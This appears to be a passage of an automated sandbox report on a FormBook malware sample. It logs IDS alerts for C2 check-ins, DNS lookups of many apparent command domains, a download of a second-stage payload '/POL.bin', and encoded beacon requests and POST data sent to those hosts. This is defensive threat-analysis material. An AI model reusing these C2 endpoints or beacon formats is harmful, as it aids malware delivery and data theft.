        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49832 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 13.248.169.48:80
        Source: DNS query: www.ngmr.xyz
        Source: Joe Sandbox ViewIP Address: 103.21.221.4 103.21.221.4
        Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
        Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
        Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49755 -> 185.86.211.137:80
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /POL.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /POL.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /ewr1/?Xb3xI=yez6Hf8Nj9Hz2QzY0/kGZkWHaPFJ5S6eHe7u1tM28nyQurG92QfHcGFdjgIUViF/gPksZ2ZTtaNFMQ6yCGD+tVTZAN9QT6lG744IlGnILDcgbby9ijaATPk=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.inastra.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /tcs6/?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.invicta.worldConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /bqye/?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /was5/?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7k8f/?O4bP=9dRH6ZfHbJX&Xb3xI=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /txr6/?Xb3xI=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.ngmr.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7cy1/?Xb3xI=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qjs8/?Xb3xI=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.typ67.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /phvf/?O4bP=9dRH6ZfHbJX&Xb3xI=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.greekhause.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /d84b/?Xb3xI=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dorikis.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qo4k/?O4bP=9dRH6ZfHbJX&Xb3xI=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.platinumkitchens.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /yyvd/?Xb3xI=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dhkatp.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tempatmudisini01.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qwk1/?Xb3xI=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /ytua/?Xb3xI=eEoKyIBkgP1r3UaSX5x2BcdCaSeQE0m7SIzn6MAF2Eoa7eZjgA7VjWJ9hDDUm15GkCbg2BHkZRaH6Ojl2CuAMP081j8WR4/cwGyXJgzH3SFq+T0y0nykltc=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dxeg.lolConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /dlt0/?Xb3xI=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tukaari.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficDNS traffic detected: DNS query: bestpack.ee
        Source: global trafficDNS traffic detected: DNS query: www.inastra.online
        Source: global trafficDNS traffic detected: DNS query: www.invicta.world
        Source: global trafficDNS traffic detected: DNS query: www.whats-in-the-box.org
        Source: global trafficDNS traffic detected: DNS query: www.linkwave.cloud
        Source: global trafficDNS traffic detected: DNS query: www.dfmagazine.shop
        Source: global trafficDNS traffic detected: DNS query: www.ngmr.xyz
        Source: global trafficDNS traffic detected: DNS query: www.albero-dveri.online
        Source: global trafficDNS traffic detected: DNS query: www.typ67.top
        Source: global trafficDNS traffic detected: DNS query: www.greekhause.org
        Source: global trafficDNS traffic detected: DNS query: www.dorikis.online
        Source: global trafficDNS traffic detected: DNS query: www.platinumkitchens.info
        Source: global trafficDNS traffic detected: DNS query: www.dhkatp.vip
        Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini01.click
        Source: global trafficDNS traffic detected: DNS query: www.komart.shop
        Source: global trafficDNS traffic detected: DNS query: www.dxeg.lol
        Source: global trafficDNS traffic detected: DNS query: www.tukaari.shop
        Source: unknownHTTP traffic detected: POST /tcs6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.invicta.worldOrigin: http://www.invicta.worldReferer: http://www.invicta.world/tcs6/Content-Length: 202Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 58 62 33 78 49 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 59 72 68 6a 6d 34 2b 75 44 55 64 34 57 77 75 36 45 71 67 57 4e 75 57 65 6e 52 70 6b 43 2b 47 43 4e 4d 79 6b 6b 68 49 4c 48 44 4e 36 30 39 54 6c 41 65 51 50 68 36 5a 69 59 67 53 4e 4a 30 6c 48 62 6c 5a 36 35 4a 74 65 35 48 53 71 42 41 55 31 39 62 30 6b 6e 58 6e 7a 72 2b 6f 78 73 6c 63 31 67 4e 6c 6b 35 79 74 33 47 72 6c 2b 72 4d 77 44 6c 33 4a 2b 70 4f 2b 6f 7a 37 33 67 74 78 41 2b 62 4c 2f 37 45 42 37 67 65 7a 30 6c 6d 38 4f 50 6e 35 2b 30 65 4c 72 77 61 76 62 36 38 62 38 50 6c 6d 56 51 52 4e 49 49 63 79 61 62 2b 69 4f 53 38 32 6a 52 73 67 3d 3d Data Ascii: Xb3xI=ZRDWWn0ISYUYYrhjm4+uDUd4Wwu6EqgWNuWenRpkC+GCNMykkhILHDN609TlAeQPh6ZiYgSNJ0lHblZ65Jte5HSqBAU19b0knXnzr+oxslc1gNlk5yt3Grl+rMwDl3J+pO+oz73gtxA+bL/7EB7gez0lm8OPn5+0eLrwavb68b8PlmVQRNIIcyab+iOS82jRsg==
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Content-Type: text/html; charset=iso-8859-1
          Content-Length: 282
          Accept-Ranges: bytes
          Date: Wed, 25 Sep 2024 08:18:34 GMT
          X-Varnish: 1105030324
          Age: 0
          Via: 1.1 varnish
          Connection: close
          X-Varnish-Cache: MISS
          Server: C2M Server v1.02
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Content-Type: text/html; charset=iso-8859-1
          Content-Length: 282
          Accept-Ranges: bytes
          Date: Wed, 25 Sep 2024 08:18:36 GMT
          X-Varnish: 1105030335
          Age: 0
          Via: 1.1 varnish
          Connection: close
          X-Varnish-Cache: MISS
          Server: C2M Server v1.02
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Content-Type: text/html; charset=iso-8859-1
          Content-Length: 282
          Accept-Ranges: bytes
          Date: Wed, 25 Sep 2024 08:18:39 GMT
          X-Varnish: 1105030363
          Age: 0
          Via: 1.1 varnish
          Connection: close
          X-Varnish-Cache: MISS
          Server: C2M Server v1.02
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Content-Type: text/html; charset=iso-8859-1
          Content-Length: 282
          Accept-Ranges: bytes
          Date: Wed, 25 Sep 2024 08:18:42 GMT
          X-Varnish: 1105030372
          Age: 0
          Via: 1.1 varnish
          Connection: close
          X-Varnish-Cache: MISS
          Server: C2M Server v1.02
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx
          Date: Wed, 25 Sep 2024 07:56:22 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Content-Encoding: gzip
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx
          Date: Wed, 25 Sep 2024 07:56:25 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Content-Encoding: gzip
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx
          Date: Wed, 25 Sep 2024 07:56:28 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Content-Encoding: gzip
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx
          Date: Wed, 25 Sep 2024 07:56:30 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx
          Date: Wed, 25 Sep 2024 07:56:36 GMT
          Content-Type: text/html
          Content-Length: 138
          Connection: close
          ETag: "66b1b463-8a"
          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx
          Date: Wed, 25 Sep 2024 07:56:39 GMT
          Content-Type: text/html
          Content-Length: 138
          Connection: close
          ETag: "66b1b463-8a"
          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx
          Date: Wed, 25 Sep 2024 07:56:42 GMT
          Content-Type: text/html
          Content-Length: 138
          Connection: close
          ETag: "66b1b463-8a"
          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx
          Date: Wed, 25 Sep 2024 07:56:45 GMT
          Content-Type: text/html
          Content-Length: 138
          Connection: close
          ETag: "66b1b463-8a"
          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Wed, 25 Sep 2024 07:57:05 GMT
          Server: Apache
          X-Frame-Options: SAMEORIGIN
          Content-Length: 389
          X-XSS-Protection: 1; mode=block
          Connection: close
          Content-Type: text/html
          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Wed, 25 Sep 2024 07:57:08 GMT
          Server: Apache
          X-Frame-Options: SAMEORIGIN
          Content-Length: 389
          X-XSS-Protection: 1; mode=block
          Connection: close
          Content-Type: text/html
          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Wed, 25 Sep 2024 07:57:11 GMT
          Server: Apache
          X-Frame-Options: SAMEORIGIN
          Content-Length: 389
          X-XSS-Protection: 1; mode=block
          Connection: close
          Content-Type: text/html
          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Wed, 25 Sep 2024 07:57:14 GMT
          Server: Apache
          X-Frame-Options: SAMEORIGIN
          Content-Length: 389
          X-XSS-Protection: 1; mode=block
          Connection: close
          Content-Type: text/html; charset=utf-8
          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Connection: close
          x-powered-by: PHP/7.4.33
          x-litespeed-tag: 894_HTTP.404
          expires: Wed, 11 Jan 1984 05:00:00 GMT
          content-type: text/html; charset=UTF-8
          link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
          x-litespeed-cache-control: no-cache
          cache-control: no-cache, no-store, must-revalidate, max-age=0
          content-length: 11547
          content-encoding: br
          vary: Accept-Encoding
          date: Wed, 25 Sep 2024 07:57:47 GMT
          server: LiteSpeed
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Connection: close
          x-powered-by: PHP/7.4.33
          x-litespeed-tag: 894_HTTP.404
          expires: Wed, 11 Jan 1984 05:00:00 GMT
          content-type: text/html; charset=UTF-8
          link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
          x-litespeed-cache-control: no-cache
          cache-control: no-cache, no-store, must-revalidate, max-age=0
          transfer-encoding: chunked
          content-encoding: br
          vary: Accept-Encoding
          date: Wed, 25 Sep 2024 07:57:49 GMT
          server: LiteSpeed
        Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Connection: close
          x-powered-by: PHP/7.4.33
          x-litespeed-tag: 894_HTTP.404
          expires: Wed, 11 Jan 1984 05:00:00 GMT
          content-type: text/html; charset=UTF-8
          link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
          x-litespeed-cache-control: no-cache
          cache-control: no-cache, no-store, must-revalidate, max-age=0
          transfer-encoding: chunked
          content-encoding: br
          vary: Accept-Encoding
          date: Wed, 25 Sep 2024 07:57:52 GMT
          server: LiteSpeed
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            content-encoding: gzip
            content-type: text/html
            date: Wed, 25 Sep 2024 07:58:02 GMT
            etag: W/"66d6a4ca-2b5"
            server: nginx
            vary: Accept-Encoding
            content-length: 454
            connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            content-encoding: gzip
            content-type: text/html
            date: Wed, 25 Sep 2024 07:58:04 GMT
            etag: W/"66d6a4ca-2b5"
            server: nginx
            vary: Accept-Encoding
            content-length: 454
            connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            content-encoding: gzip
            content-type: text/html
            date: Wed, 25 Sep 2024 07:58:07 GMT
            etag: W/"66d6a4ca-2b5"
            server: nginx
            vary: Accept-Encoding
            content-length: 454
            connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            content-type: text/html
            date: Wed, 25 Sep 2024 07:58:10 GMT
            etag: W/"66d6a4ca-2b5"
            server: nginx
            vary: Accept-Encoding
            content-length: 693
            connection: close
            Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=iso-8859-1
            Content-Length: 282
            Accept-Ranges: bytes
            Date: Wed, 25 Sep 2024 08:22:19 GMT
            X-Varnish: 1105031287
            Age: 0
            Via: 1.1 varnish
            Connection: close
            X-Varnish-Cache: MISS
            Server: C2M Server v1.02
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=iso-8859-1
            Content-Length: 282
            Accept-Ranges: bytes
            Date: Wed, 25 Sep 2024 08:22:21 GMT
            X-Varnish: 1105031295
            Age: 0
            Via: 1.1 varnish
            Connection: close
            X-Varnish-Cache: MISS
            Server: C2M Server v1.02
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=iso-8859-1
            Content-Length: 282
            Accept-Ranges: bytes
            Date: Wed, 25 Sep 2024 08:22:24 GMT
            X-Varnish: 1105031299
            Age: 0
            Via: 1.1 varnish
            Connection: close
            X-Varnish-Cache: MISS
            Server: C2M Server v1.02
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=iso-8859-1
            Content-Length: 282
            Accept-Ranges: bytes
